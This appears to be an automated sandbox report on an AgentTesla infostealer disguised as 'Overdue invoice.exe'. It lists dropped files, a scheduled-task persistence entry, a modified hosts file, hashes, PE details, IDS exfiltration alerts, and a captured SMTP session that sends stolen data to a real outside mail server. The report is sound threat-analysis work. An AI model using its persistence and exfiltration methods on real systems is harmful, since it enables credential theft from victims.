                                                                        SHA-256:8037DD1DC6177AFE6038B4A78C79274F4DFFF4A96098ACE279B12517F607EEB8
                                                                        SHA-512:AA980A773C0DC2E154EB1D060F3D90F05814E74BCE492C50DC2904D73724BC18ADF7677C127CEF0B98230856AEF47B42E39CE43293B7F7E28A77CEE9DD7980E4
                                                                        Malicious:true
                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

                                                                        C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Overdue invoice.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):731648
                                                                        Entropy (8bit):7.384642302436539
                                                                        Encrypted:false
                                                                        SSDEEP:12288:/52iNKUwVRh6UkRKstKDBi3x0Z5S2EetsSJhjsudQVYJUEKl75jQWmc:x18Ph6UkgstKFkYS270u2VYJUEKlCW
                                                                        MD5:21C2F8CC3F1D71FFB036CA3788A346B6
                                                                        SHA1:B1F681EB0C5B406BAD2414829D003568AB44982C
                                                                        SHA-256:8E68AC628396CBB8619A54FFCE8AEDAE2A20CA23E514813B70C99987175F735D
                                                                        SHA-512:4A6BE00ECBE056B5951926A87529A0993D5902841BB491460F8F6EAE1AAB017FF4EE2E8AF3C604AE0540C14B56751F517554AFC863918AB92362B3339A3CE406
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 60%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b.....................H........... ........@.. ....................................@.................................@...W........E...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....E.......F..................@..@.reloc.......`.......(..............@..B................|.......H.......P....R......B....y...1..........................................z.(".....}.....(#...o$...}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....o....*..{....*.s%.

                                                                        C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Overdue invoice.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):731648
                                                                        Entropy (8bit):7.384642302436539
                                                                        Encrypted:false
                                                                        SSDEEP:12288:/52iNKUwVRh6UkRKstKDBi3x0Z5S2EetsSJhjsudQVYJUEKl75jQWmc:x18Ph6UkgstKFkYS270u2VYJUEKlCW
                                                                        MD5:21C2F8CC3F1D71FFB036CA3788A346B6
                                                                        SHA1:B1F681EB0C5B406BAD2414829D003568AB44982C
                                                                        SHA-256:8E68AC628396CBB8619A54FFCE8AEDAE2A20CA23E514813B70C99987175F735D
                                                                        SHA-512:4A6BE00ECBE056B5951926A87529A0993D5902841BB491460F8F6EAE1AAB017FF4EE2E8AF3C604AE0540C14B56751F517554AFC863918AB92362B3339A3CE406
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 60%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b.....................H........... ........@.. ....................................@.................................@...W........E...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....E.......F..................@..@.reloc.......`.......(..............@..B................|.......H.......P....R......B....y...1..........................................z.(".....}.....(#...o$...}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....o....*..{....*.s%.

                                                                        C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe:Zone.Identifier

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Overdue invoice.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:modified
                                                                        Size (bytes):26
                                                                        Entropy (8bit):3.95006375643621
                                                                        Encrypted:false
                                                                        SSDEEP:3:ggPYV:rPYV
                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                        Malicious:true
                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                        C:\Windows\System32\drivers\etc\hosts

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Overdue invoice.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):835
                                                                        Entropy (8bit):4.694294591169137
                                                                        Encrypted:false
                                                                        SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                                                        MD5:6EB47C1CF858E25486E42440074917F2
                                                                        SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                                                        SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                                                        SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                                                        Malicious:true
                                                                        Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.384642302436539
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:Overdue invoice.exe
                                                                        File size:731648
                                                                        MD5:21c2f8cc3f1d71ffb036ca3788a346b6
                                                                        SHA1:b1f681eb0c5b406bad2414829d003568ab44982c
                                                                        SHA256:8e68ac628396cbb8619a54ffce8aedae2a20ca23e514813b70c99987175f735d
                                                                        SHA512:4a6be00ecbe056b5951926a87529a0993d5902841bb491460f8f6eae1aab017ff4ee2e8af3c604ae0540c14b56751f517554afc863918ab92362b3339a3ce406
                                                                        SSDEEP:12288:/52iNKUwVRh6UkRKstKDBi3x0Z5S2EetsSJhjsudQVYJUEKl75jQWmc:x18Ph6UkgstKFkYS270u2VYJUEKlCW
                                                                        TLSH:75F4CF20F71FB8D1D66EC6740BB686221EA14D7EFCF9921E5597314B0A31392601BCAF
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b.....................H........... ........@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:04fcf0b0d4a6e46c

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x47fe9a
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                        Time Stamp:0x628EC311 [Thu May 26 00:00:17 2022 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:v4.0.30319
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x7fe400x57.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x345bc.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000x7dea00x7e000False0.818219866071data7.65168574947IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x800000x345bc0x34600False0.445009509248data6.26427887157IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0xb60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_ICON0x802b00xc5d8PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                        RT_ICON0x8c8880x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0x9d0b00x94a8data
                                                                        RT_ICON0xa65580x5488data
                                                                        RT_ICON0xab9e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                                        RT_ICON0xafc080x25a8data
                                                                        RT_ICON0xb21b00x10a8data
                                                                        RT_ICON0xb32580x988data
                                                                        RT_ICON0xb3be00x468GLS_BINARY_LSB_FIRST
                                                                        RT_GROUP_ICON0xb40480x84data
                                                                        RT_VERSION0xb40cc0x33cdata
                                                                        RT_MANIFEST0xb44080x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Version Infos

                                                                        DescriptionData
                                                                        Translation0x0000 0x04b0
                                                                        LegalCopyrightCopyright 2015
                                                                        Assembly Version1.0.0.0
                                                                        InternalNamecCjl.exe
                                                                        FileVersion1.0.0.0
                                                                        CompanyNameFCSF
                                                                        LegalTrademarks
                                                                        Comments
                                                                        ProductNameEvent Transmission
                                                                        ProductVersion1.0.0.0
                                                                        FileDescriptionEvent Transmission
                                                                        OriginalFilenamecCjl.exe

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        192.168.2.3206.183.111.188497155872840032 05/27/22-12:53:52.919110TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249715587192.168.2.3206.183.111.188
                                                                        192.168.2.3206.183.111.188497155872030171 05/27/22-12:53:52.919010TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49715587192.168.2.3206.183.111.188
                                                                        192.168.2.3206.183.111.188497455872030171 05/27/22-12:54:26.668198TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49745587192.168.2.3206.183.111.188
                                                                        192.168.2.3206.183.111.188497155872839723 05/27/22-12:53:52.919010TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49715587192.168.2.3206.183.111.188
                                                                        192.168.2.3206.183.111.188497455872840032 05/27/22-12:54:26.668311TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249745587192.168.2.3206.183.111.188
                                                                        192.168.2.3206.183.111.188497455872839723 05/27/22-12:54:26.668198TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49745587192.168.2.3206.183.111.188

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        May 27, 2022 12:53:50.993177891 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:53:51.123843908 CEST58749715206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:53:51.123989105 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:53:51.877722979 CEST58749715206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:53:51.918479919 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:53:51.957850933 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:53:52.088825941 CEST58749715206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:53:52.137103081 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:53:52.178985119 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:53:52.310087919 CEST58749715206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:53:52.364459991 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:53:52.507563114 CEST58749715206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:53:52.508352995 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:53:52.638927937 CEST58749715206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:53:52.639225006 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:53:52.786659956 CEST58749715206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:53:52.786880970 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:53:52.917552948 CEST58749715206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:53:52.917664051 CEST58749715206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:53:52.919009924 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:53:52.919110060 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:53:52.919651031 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:53:52.919720888 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:53:53.050086975 CEST58749715206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:53:53.050416946 CEST58749715206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:53:53.054867029 CEST58749715206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:53:53.262171030 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:54:22.889226913 CEST49745587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:54:23.023149014 CEST58749745206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:54:23.025516987 CEST49745587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:54:25.429943085 CEST58749745206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:54:25.444358110 CEST49745587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:54:25.578612089 CEST58749745206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:54:25.582864046 CEST49745587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:54:25.717389107 CEST58749745206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:54:25.743762970 CEST49745587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:54:25.893343925 CEST58749745206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:54:25.893627882 CEST49745587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:54:26.028583050 CEST58749745206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:54:26.028840065 CEST49745587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:54:26.177023888 CEST58749745206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:54:26.218147993 CEST49745587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:54:26.500936985 CEST49745587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:54:26.634860992 CEST58749745206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:54:26.634953022 CEST58749745206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:54:26.668198109 CEST49745587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:54:26.668311119 CEST49745587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:54:26.668384075 CEST49745587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:54:26.668456078 CEST49745587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:54:26.803858042 CEST58749745206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:54:26.803900957 CEST58749745206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:54:26.809715033 CEST58749745206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:54:26.858817101 CEST49745587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:55:29.490083933 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:55:29.660953045 CEST58749715206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:55:29.823596954 CEST58749715206.183.111.188192.168.2.3
                                                                        May 27, 2022 12:55:29.823791027 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:55:29.823844910 CEST49715587192.168.2.3206.183.111.188
                                                                        May 27, 2022 12:55:29.954498053 CEST58749715206.183.111.188192.168.2.3

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        May 27, 2022 12:53:49.667876959 CEST4931653192.168.2.38.8.8.8
                                                                        May 27, 2022 12:53:50.838224888 CEST4931653192.168.2.38.8.8.8
                                                                        May 27, 2022 12:53:50.942549944 CEST53493168.8.8.8192.168.2.3
                                                                        May 27, 2022 12:54:22.740289927 CEST5811653192.168.2.38.8.8.8
                                                                        May 27, 2022 12:54:22.844952106 CEST53581168.8.8.8192.168.2.3

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        May 27, 2022 12:53:49.667876959 CEST192.168.2.38.8.8.80xb85eStandard query (0)mail.jkudyog.comA (IP address)IN (0x0001)
                                                                        May 27, 2022 12:53:50.838224888 CEST192.168.2.38.8.8.80xb85eStandard query (0)mail.jkudyog.comA (IP address)IN (0x0001)
                                                                        May 27, 2022 12:54:22.740289927 CEST192.168.2.38.8.8.80xf7d3Standard query (0)mail.jkudyog.comA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        May 27, 2022 12:53:50.942549944 CEST8.8.8.8192.168.2.30xb85eNo error (0)mail.jkudyog.com206.183.111.188A (IP address)IN (0x0001)
                                                                        May 27, 2022 12:54:22.844952106 CEST8.8.8.8192.168.2.30xf7d3No error (0)mail.jkudyog.com206.183.111.188A (IP address)IN (0x0001)

                                                                        SMTP Packets

                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                        May 27, 2022 12:53:51.877722979 CEST58749715206.183.111.188192.168.2.3220-hulk.rapidns.com ESMTP Exim 4.95 #2 Fri, 27 May 2022 16:23:51 +0530
                                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                                        220 and/or bulk e-mail.
                                                                        May 27, 2022 12:53:51.957850933 CEST49715587192.168.2.3206.183.111.188EHLO 701188
                                                                        May 27, 2022 12:53:52.088825941 CEST58749715206.183.111.188192.168.2.3250-hulk.rapidns.com Hello 701188 [102.129.143.42]
                                                                        250-SIZE 52428800
                                                                        250-8BITMIME
                                                                        250-PIPELINING
                                                                        250-PIPE_CONNECT
                                                                        250-AUTH PLAIN LOGIN
                                                                        250-STARTTLS
                                                                        250 HELP
                                                                        May 27, 2022 12:53:52.178985119 CEST49715587192.168.2.3206.183.111.188AUTH login YXNodXRvc2hAamt1ZHlvZy5jb20=
                                                                        May 27, 2022 12:53:52.310087919 CEST58749715206.183.111.188192.168.2.3334 UGFzc3dvcmQ6
                                                                        May 27, 2022 12:53:52.507563114 CEST58749715206.183.111.188192.168.2.3235 Authentication succeeded
                                                                        May 27, 2022 12:53:52.508352995 CEST49715587192.168.2.3206.183.111.188MAIL FROM:<ashutosh@jkudyog.com>
                                                                        May 27, 2022 12:53:52.638927937 CEST58749715206.183.111.188192.168.2.3250 OK
                                                                        May 27, 2022 12:53:52.639225006 CEST49715587192.168.2.3206.183.111.188RCPT TO:<markhung@jingtai.com.vn>
                                                                        May 27, 2022 12:53:52.786659956 CEST58749715206.183.111.188192.168.2.3250 Accepted
                                                                        May 27, 2022 12:53:52.786880970 CEST49715587192.168.2.3206.183.111.188DATA
                                                                        May 27, 2022 12:53:52.917664051 CEST58749715206.183.111.188192.168.2.3354 Enter message, ending with "." on a line by itself
                                                                        May 27, 2022 12:53:52.919720888 CEST49715587192.168.2.3206.183.111.188.
                                                                        May 27, 2022 12:53:53.054867029 CEST58749715206.183.111.188192.168.2.3250 OK id=1nuXbN-000NU7-4h
                                                                        May 27, 2022 12:54:25.429943085 CEST58749745206.183.111.188192.168.2.3220-hulk.rapidns.com ESMTP Exim 4.95 #2 Fri, 27 May 2022 16:24:25 +0530
                                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                                        220 and/or bulk e-mail.
                                                                        May 27, 2022 12:54:25.444358110 CEST49745587192.168.2.3206.183.111.188EHLO 701188
                                                                        May 27, 2022 12:54:25.578612089 CEST58749745206.183.111.188192.168.2.3250-hulk.rapidns.com Hello 701188 [102.129.143.42]
                                                                        250-SIZE 52428800
                                                                        250-8BITMIME
                                                                        250-PIPELINING
                                                                        250-PIPE_CONNECT
                                                                        250-AUTH PLAIN LOGIN
                                                                        250-STARTTLS
                                                                        250 HELP
                                                                        May 27, 2022 12:54:25.582864046 CEST49745587192.168.2.3206.183.111.188AUTH login YXNodXRvc2hAamt1ZHlvZy5jb20=
                                                                        May 27, 2022 12:54:25.717389107 CEST58749745206.183.111.188192.168.2.3334 UGFzc3dvcmQ6
                                                                        May 27, 2022 12:54:25.893343925 CEST58749745206.183.111.188192.168.2.3235 Authentication succeeded
                                                                        May 27, 2022 12:54:25.893627882 CEST49745587192.168.2.3206.183.111.188MAIL FROM:<ashutosh@jkudyog.com>
                                                                        May 27, 2022 12:54:26.028583050 CEST58749745206.183.111.188192.168.2.3250 OK
                                                                        May 27, 2022 12:54:26.028840065 CEST49745587192.168.2.3206.183.111.188RCPT TO:<markhung@jingtai.com.vn>
                                                                        May 27, 2022 12:54:26.177023888 CEST58749745206.183.111.188192.168.2.3250 Accepted
                                                                        May 27, 2022 12:54:26.500936985 CEST49745587192.168.2.3206.183.111.188DATA
                                                                        May 27, 2022 12:54:26.634953022 CEST58749745206.183.111.188192.168.2.3354 Enter message, ending with "." on a line by itself
                                                                        May 27, 2022 12:54:26.668456078 CEST49745587192.168.2.3206.183.111.188.
                                                                        May 27, 2022 12:54:26.809715033 CEST58749745206.183.111.188192.168.2.3250 OK id=1nuXbu-000NXK-Rm
                                                                        May 27, 2022 12:55:29.490083933 CEST49715587192.168.2.3206.183.111.188QUIT
                                                                        May 27, 2022 12:55:29.823596954 CEST58749715206.183.111.188192.168.2.3221 hulk.rapidns.com closing connection

                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:12:53:16
                                                                        Start date:27/05/2022
                                                                        Path:C:\Users\user\Desktop\Overdue invoice.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\Overdue invoice.exe"
                                                                        Imagebase:0x520000
                                                                        File size:731648 bytes
                                                                        MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
